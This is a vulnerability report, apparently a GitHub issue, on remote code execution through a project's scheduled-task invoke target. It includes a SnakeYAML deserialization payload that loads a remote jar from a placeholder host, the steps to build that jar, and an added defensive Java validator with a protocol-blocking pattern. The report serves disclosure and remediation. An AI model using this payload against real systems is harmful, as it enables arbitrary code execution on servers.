
[vulnerability] Remote Code Execute #13

@c41ico

Description


1. Steps to reproduce

Using the project https://github.com/artsploit/yaml-payload, modify AwesomeScriptEngineFactory.java as follows:

[screenshot omitted: modified AwesomeScriptEngineFactory.java]

Build and package it, then move yaml-payload.jar into the root directory of the web service:

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

When using the Scheduled Tasks feature, the invoke target string always contains symbols such as brackets and quotes; however, the program's XSSFilter converts these symbols to other characters, which makes the Scheduled Tasks feature completely unusable. So the routes related to scheduled tasks have to be whitelisted in the XSSFilter configuration in application.yml.

[screenshot omitted: XSSFilter whitelist in application.yml]

A new scheduled task is created as follows:

[screenshot omitted: new scheduled task form]

The "invoke target string" (调用目标字符串) field is org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')

Executing this task after submission remotely executes arbitrary code.

2. Expected behavior

The com.aurora.util.JobInvokeUtil#invokeMethod method is used to reflectively execute the specified method of the given class.

[screenshot omitted: JobInvokeUtil#invokeMethod source]

3. Actual behavior

However, this method does not filter the incoming class name or method name, so dangerous class names and method names can be passed in and executed.

4. Affected Version

v2

5. Fix recommendations

  1. Filter dangerous class names
  2. Filter unnecessary protocols such as http, rmi, etc.
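The two recommendations above, as an added example that is not the project's own code: an allow-list check on the invoke target string that could run before JobInvokeUtil#invokeMethod resolves anything by reflection. It goes slightly beyond the report by allow-listing the job package instead of only blocking known-dangerous classes; the package name com.aurora.quartz.task, the denied method names and the sample targets are assumptions.

```java
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Hypothetical validator for scheduled-task invoke targets (example code, not the project's). */
public final class InvokeTargetValidator {
    // Assumed job package: only classes under it may be invoked by a scheduled task.
    private static final List<String> ALLOWED_PACKAGES = List.of("com.aurora.quartz.task.");
    // Methods that must never be reachable through a task, even on an allowed class.
    private static final Set<String> DENIED_METHODS = Set.of("load", "loadAs", "exec", "forName", "newInstance");
    // Remote-loading protocols have no place in a job argument (recommendation 2).
    private static final Pattern PROTOCOL = Pattern.compile("(?i)\\b(https?|rmi|ldaps?|jndi|ftp|jar|file)\\s*:");
    // Shape of a target: fully.qualified.ClassName.methodName(args)
    private static final Pattern TARGET = Pattern.compile(
        "^([A-Za-z_$][\\w$]*(?:\\.[A-Za-z_$][\\w$]*)+)\\.([A-Za-z_$][\\w$]*)\\((.*)\\)$", Pattern.DOTALL);

    /** Returns true only when the class, method and arguments all pass the allow-list checks. */
    public static boolean isAllowed(String invokeTarget) {
        if (invokeTarget == null || invokeTarget.length() > 512) return false;
        Matcher m = TARGET.matcher(invokeTarget.trim());
        if (!m.matches()) return false;
        String className = m.group(1), method = m.group(2), args = m.group(3);
        if (ALLOWED_PACKAGES.stream().noneMatch(className::startsWith)) return false; // recommendation 1
        if (DENIED_METHODS.contains(method)) return false;
        if (args.contains("!!")) return false; // SnakeYAML explicit-tag syntax is never a legitimate argument
        return !PROTOCOL.matcher(args).find();
    }

    public static void main(String[] argv) {
        // Constructed sample targets: the first should pass, the other two must be rejected.
        String[] samples = {
            "com.aurora.quartz.task.AuroraQuartzTask.hello('world')",
            "org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [...]')",
            "com.aurora.quartz.task.AuroraQuartzTask.fetch('http://example.invalid/x.jar')"
        };
        for (String s : samples) System.out.println(isAllowed(s) + "  " + s);
    }
}
```

Rejections from a check like this are worth logging with the submitting user and the raw target string, since a rejected target is a strong signal of an attempted abuse of the feature.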
